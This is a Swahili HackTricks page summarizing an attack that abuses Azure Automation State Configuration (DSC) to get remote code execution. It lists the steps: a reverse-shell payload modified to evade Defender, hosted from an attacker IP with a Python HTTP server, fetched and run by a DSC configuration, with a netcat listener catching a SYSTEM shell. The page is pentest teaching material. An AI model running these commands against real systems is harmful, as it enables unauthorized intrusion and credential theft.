Az - State Configuration RCE

Jifunze kuhusu udukuzi wa AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Angalia chapisho kamili katika: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Muhtasari wa Maandalizi na Hatua za Miundombinu ya Seva ya Mbali (C2)

Maelezo

Mchakato unahusisha kuweka miundombinu ya seva ya mbali kuhifadhi mzigo uliobadilishwa wa Nishang Invoke-PowerShellTcp.ps1, uitwao RevPS.ps1, ulioundwa kuvuka Windows Defender. Mzigo huo unahudumiwa kutoka kwa mashine ya Kali Linux yenye IP 40.84.7.74 kwa kutumia seva rahisi ya HTTP ya Python. Operesheni hutekelezwa kupitia hatua kadhaa:

Hatua 1 — Unda Faili

  • Faili Zinazohitajika: Inahitajika hati mbili za PowerShell:

  1. reverse_shell_config.ps1: Faili ya Hali ya Utekelezaji Inayotakikana (DSC) ambayo hupata na kutekeleza mzigo. Inapatikana kwenye GitHub.

  2. push_reverse_shell_config.ps1: Hati ya kuchapisha usanidi kwenye VM, inapatikana kwenye GitHub.

  • Ubadilishaji: Vigezo na marameteri katika faili hizi lazima zibadilishwe kulingana na mazingira maalum ya mtumiaji, ikiwa ni pamoja na majina ya rasilimali, njia za faili, na vitambulishi vya seva/mzigo.

Hatua 2 — Pakia Faili ya Usanidi kwenye Zip

  • reverse_shell_config.ps1 inafungwa katika faili ya .zip, ikifanya iwe tayari kwa uhamisho kwenye Akaunti ya Uhifadhi ya Azure.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Hatua ya 3 — Weka Muktadha wa Uhifadhi & Pakia

  • Faili iliyozipwa ya usanidi inapakiwa kwenye chombo kilichopangwa mapema cha Uhifadhi wa Azure, azure-pentest, kwa kutumia amri ya Set-AzStorageBlobContent ya Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Hatua ya 4 — Andaa Kali Box

  • Seva ya Kali inapakua mzigo wa RevPS.ps1 kutoka kwenye hazina ya GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
  • Skripti imehaririwa ili kufafanua lengo la VM ya Windows na bandari kwa reverse shell.

Hatua 5 — Chapisha Faili ya Mipangilio

  • Faili ya mipangilio inatekelezwa, ikisababisha skripti ya reverse-shell kuwekwa kwenye eneo lililoelezwa kwenye VM ya Windows.

Hatua 6 — Mwenyeji wa Mzigo na Kuweka Msikilizaji

  • Python SimpleHTTPServer inaanzishwa kuhudumia mzigo, pamoja na msikilizaji wa Netcat kukamata mawasiliano yanayoingia.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • Kazi iliyopangwa inatekeleza mzigo, ikipata mamlaka ya kiwango cha SYSTEM.

Hitimisho

Utekelezaji mafanikio wa mchakato huu hufungua fursa nyingi kwa hatua zaidi, kama vile kuvuja kwa siri za uthibitisho au kupanua shambulio kwa VM nyingi. Mwongozo unahimiza uendelezaji wa ujifunzaji na ubunifu katika uga wa Azure Automation DSC.

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

Last updated